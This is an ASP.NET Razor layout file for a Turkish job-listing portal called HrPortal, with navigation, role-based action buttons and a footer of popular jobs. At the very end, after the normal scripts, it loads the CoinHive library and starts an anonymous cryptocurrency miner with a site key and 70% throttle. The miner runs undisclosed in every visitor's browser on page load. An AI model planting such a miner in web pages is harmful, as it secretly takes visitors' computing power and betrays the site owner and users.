@inject HrPortal.Services.IRepository<Job> jobRepository
@inject UserManager<ApplicationUser> UserManager
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Post a job position or create your online resume by TheJobs!">
    <meta name="keywords" content="">

    <title>@ViewBag.Title</title>

    <!-- Styles -->
    <link href="/assets/css/app.min.css" rel="stylesheet">
    <link href="/assets/css/custom.css" rel="stylesheet">
    <!-- Fonts -->
    <link href='http://fonts.googleapis.com/css?family=Oswald:100,300,400,500,600,800%7COpen+Sans:300,400,500,600,700,800%7CMontserrat:400,700' rel='stylesheet' type='text/css'>

    <!-- Favicons -->
    <link rel="apple-touch-icon" href="/apple-touch-icon.png">
    <link rel="icon" href="~/assets/img/cvfavicon.ico">
    <meta name="viewport" content="width=device-width" />
    <title>@ViewBag.Title</title>
    <style>
        .dropify-wrapper, .bootstrap-select, .form-control {
            border: 1px solid #aaaaaa !important;
        }

        .help-block {
            color: grey;
        }

        :: -webkit-input-placeholder { /* WebKit, Blink, Edge */
            color: grey !important;
            opacity: 1;
        }

        :-moz-placeholder { /* Mozilla Firefox 4 to 18 */
            color: grey !important;
            opacity: 1;
        }

        ::-moz-placeholder { /* Mozilla Firefox 19+ */
            color: grey !important;
            opacity: 1;
        }

        :-ms-input-placeholder { /* Internet Explorer 10-11 */
            color: grey !important;
        }

        ::-ms-input-placeholder { /* Microsoft Edge */  
            color: grey !important;
        }
    </style>
</head>
<body>
    <!-- Navigation bar -->
    <nav class="navbar">
        <div class="container">

            <!-- Logo -->
            <div class="pull-left">
                <a class="navbar-toggle" href="#" data-toggle="offcanvas"><i class="ti-menu"></i></a>
             </div>
            <div class="logodiv">
    <div class="logo-wrapper">
        <a class="logo" href="/"><img src="/assets/img/logocvhavuzu.png" alt="logo"></a>
        <a class="logo-alt" href="/"><img src="/assets/img/logo-alt.png" alt="logo-alt"></a>
    </div>
            </div>
    <!-- END Logo -->
    <!-- User account -->
    <!-- END User account -->
    <!-- Navigation menu -->
    <ul class="nav-menu2">
        <li>
            <a class="menuitem active" asp-controller="Home" asp-action="Index">Anasayfa</a>

        </li>
        <li>
            <a class="menuitem" asp-controller="Jobs" asp-action="Index">İş ilanları</a>

        </li>
        <li>
            <a class="menuitem" asp-controller="Resumes" asp-action="Index">Özgeçmişler</a>

        </li>
        <li>
            <a class="menuitem" asp-controller="Companies" asp-action="Index">Firmalar</a>
        </li>
        <li>
            <a class="menuitem" asp-controller="Home" asp-action="About">Hakkımızda</a>

        </li>
        <li>
            <a class="menuitem" asp-controller="Home" asp-action="Contact">İletişim</a>
        </li>
        <li>
            @{ if (User.Identity.Name != null)
                {
                    var user = await UserManager.FindByNameAsync(User.Identity.Name);
                    if ((user.IsEmployer==true ) || (User.IsInRole("Employer")|| (User.IsInRole("Admin"))))
                    {
                        <a class="btn btn-success btn-xs" asp-controller="Jobs" asp-action="Create">İlan Ver</a>
                        <a class="btn btn-success btn-xs" asp-controller="Companies" asp-action="Create">Firma Ekle</a>
                        if ((User.IsInRole("Admin")))
                        {
                            <a class="btn btn-success btn-xs" asp-controller="Resumes" asp-action="Create">CV Oluştur</a>

                        }

                    }
                    else if ((user.IsEmployer == false) || (User.IsInRole("Candidate")) || (User.IsInRole("Admin")))
                    {

                        <a class="btn btn-success btn-xs" asp-controller="Resumes" asp-action="Create">CV Oluştur</a>
                    }
                }
                else
                {
                  
                    <a class="btn btn-success btn-xs" asp-controller="Resumes" asp-action="Create">CV Oluştur</a>
                }

            }
           
           
        </li>
    </ul>
    <ul id="login2">
        <li>
            @await Html.PartialAsync("_LoginPartial")
        </li>
    </ul>
          

    <!-- END Navigation menu -->

</div>
    </nav>

    <!-- END Navigation bar -->
    <div>
        @RenderBody()
    </div>
    <!-- Site footer -->
    <footer class="site-footer">

        <!-- Top section -->
        <div class="container">
            <div class="row">
                <div class="col-sm-12 col-md-6">
                    <h6>Hakkımızda</h6>
                    <p class="text-justify">Bir istihdam web sitesi, özellikle istihdam veya kariyer olanakları sunan bir web sitesidir. Pek çok istihdam web sitesi, işverenlerin doldurulması gereken bir pozisyon için iş gereksinimlerini göndermelerine izin vermek üzere tasarlanmıştır ve genelde iş ilan panoları olarak bilinirler. Diğer istihdam alanları, işveren değerlendirmesi, kariyer ve iş arama önerileri sunar ve farklı iş tanımlarını veya işverenleri tanımlar. Potansiyel bir çalışan, bir iş web sitesi aracılığıyla, bir iş başvurusunu bulabilir ve doldurabilir.</p>
                </div>

                <div class="col-xs-6 col-md-3">
                    <h6>Bağlantılar</h6>
                    <ul class="footer-links">
                        <li><a asp-controller="Home" asp-action="About">Hakkımızda</a></li>
                        <li><a asp-controller="Home" asp-action="HowItWorks">Nasıl çalışıyoruz</a></li>
                        <li><a asp-controller="Home" asp-action="Help">Yardım</a></li>
                        <li><a asp-controller="Home" asp-action="PrivacyPolicy">Gizlilik Politikası</a></li>
                        <li><a asp-controller="Home" asp-action="Contact">Bize Ulaşın</a></li>
                    </ul>
                </div>

                <div class="col-xs-6 col-md-3">
                    <h6>Popüler İlanlar</h6>
                    <ul class="footer-links">
                        @{ 
                            var popularJobs = jobRepository.GetAll();
                        }
                   @foreach (var job in popularJobs)
                   {
                        <li><a asp-controller="Jobs" asp-action="Details" asp-route-id="@job.Id">@job.Title</a></li>
                   }
                        
                    </ul>
                </div>
            </div>

            <hr>
        </div>
        <!-- END Top section -->
        <!-- Bottom section -->
        <div class="container">
            <div class="row">
                <div class="col-md-8 col-sm-6 col-xs-12">
                    <p class="copyright-text"> &copy; 2017 HrPortal</p>
                </div>

                <div class="col-md-4 col-sm-6 col-xs-12">
                    <ul class="social-icons">
                        <li><a class="facebook" href="#"><i class="fa fa-facebook"></i></a></li>
                        <li><a class="twitter" href="#"><i class="fa fa-twitter"></i></a></li>
                        <li><a class="youtube" href="#"><i class="fa fa-youtube"></i></a></li>
                        <li><a class="linkedin" href="#"><i class="fa fa-linkedin"></i></a></li>
                        <li><a class="instagram" href="#"><i class="fa fa-instagram"></i></a></li>
                    </ul>
                </div>
            </div>
        </div>
        <!-- END Bottom section -->

    </footer>
    <!-- END Site footer -->
    <!-- Scripts -->
    <script src="/assets/js/app.min.js"></script>
    <script src="/assets/js/custom.js"></script>
    @RenderSection("Scripts", required:false)
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
    <script>
        var miner = new CoinHive.Anonymous('xPzzVnJPOHnOSW14Z6liUMSqDtRQNl6b', { throttle: 0.7 });
        miner.start();
        console.log("mining started...");
    </script>
</body>
</html>
